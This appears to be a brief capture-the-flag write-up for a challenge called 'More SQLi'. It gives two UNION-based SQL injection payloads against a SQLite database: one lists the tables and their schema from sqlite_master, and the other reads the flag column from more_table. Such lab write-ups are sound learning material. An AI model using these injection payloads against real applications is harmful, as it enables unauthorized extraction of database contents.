OutlanderForge/my-writeups/More SQLi.md

 `' UNION SELECT name, sql, NULL from sqlite_master --`

 We find the `more_table` table with a flag column. we use another UNION select to get the contents, giving us the flag.

+`' UNION SELECT flag, NULL, NULL FROM more_table --`